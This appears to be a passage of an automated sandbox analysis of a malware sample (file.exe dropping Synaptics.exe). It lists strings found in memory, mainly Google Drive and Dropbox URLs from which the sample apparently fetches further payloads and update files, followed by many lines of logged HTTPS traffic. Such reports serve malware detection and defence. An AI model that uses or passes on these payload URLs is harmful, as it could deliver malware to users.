                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduE
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2346850361.000000001D9E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadub
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadulun
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadus
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduu
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadver
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvi
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvnK
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvz
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw5
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwF
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007227000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx;
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxG
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000072BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyD
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007367000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzL
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~)
                          Source: file.exe, 00000000.00000003.1264938493.0000000002260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                          Source: file.exe, 00000000.00000003.1264938493.0000000002260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                          Source: file.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000004.00000002.2288511831.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                          Source: Synaptics.exe, 00000004.00000002.2294250420.0000000004B0E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.comuc?id=0BxsMXGfPIZfSVlVsOGlEVGxuVk&export=download
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.userconten
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2358747058.000000001DF48000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/I
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=d.
                          Source: Synaptics.exe, 00000004.00000002.2353683433.000000001DCF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2358747058.000000001DF54000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2358747058.000000001DF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2357487031.000000001DF29000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2357487031.000000001DEE3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2357487031.000000001DF21000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007315000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2349487470.000000001DAED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2358747058.000000001DF4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                          Source: Synaptics.exe, 00000004.00000002.2302077647.0000000007308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                          Source: Synaptics.exe, 00000004.00000002.2353683433.000000001DCF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download11
                          Source: Synaptics.exe, 00000004.00000002.2302077647.0000000007308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                          Source: Synaptics.exe, 00000004.00000002.2353683433.000000001DCF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                          Source: Synaptics.exe, 00000004.00000002.2302077647.0000000007308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                          Source: Synaptics.exe, 00000004.00000002.2353683433.000000001DCF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadce
                          Source: Synaptics.exe, 00000004.00000002.2353683433.000000001DCF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                          Source: Synaptics.exe, 00000004.00000002.2353683433.000000001DCF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden
                          Source: Synaptics.exe, 00000004.00000002.2353683433.000000001DCF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiy
                          Source: Synaptics.exe, 00000004.00000002.2353683433.000000001DCF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                          Source: Synaptics.exe, 00000004.00000002.2353683433.000000001DCF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne
                          Source: Synaptics.exe, 00000004.00000002.2353683433.000000001DCF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniy6
                          Source: Synaptics.exe, 00000004.00000002.2353683433.000000001DCF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador
                          Source: Synaptics.exe, 00000004.00000002.2353683433.000000001DCF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtl
                          Source: Synaptics.exe, 00000004.00000002.2353683433.000000001DCF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyoH1
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?idk
                          Source: file.exe, 00000000.00000003.1264938493.0000000002260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                          Source: file.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000004.00000002.2288511831.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                          Source: file.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000004.00000002.2288511831.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                          Source: file.exe, 00000000.00000003.1264938493.0000000002260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlT
                          Source: file.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000004.00000002.2288511831.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50314 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50268 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50246 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50280 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50258 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50216
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50215
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50218
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50254 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50217
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50219
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50212
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50202 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50214
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50213
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50229
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50228
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50223
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50222
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50225
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50224
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50238
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50237
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50239
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50230
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50231
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50234
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50233
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50235
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50288 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50249
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50248
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50240
